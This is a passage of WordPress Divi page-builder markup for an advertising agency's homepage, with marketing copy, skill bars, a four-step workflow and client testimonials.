header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better 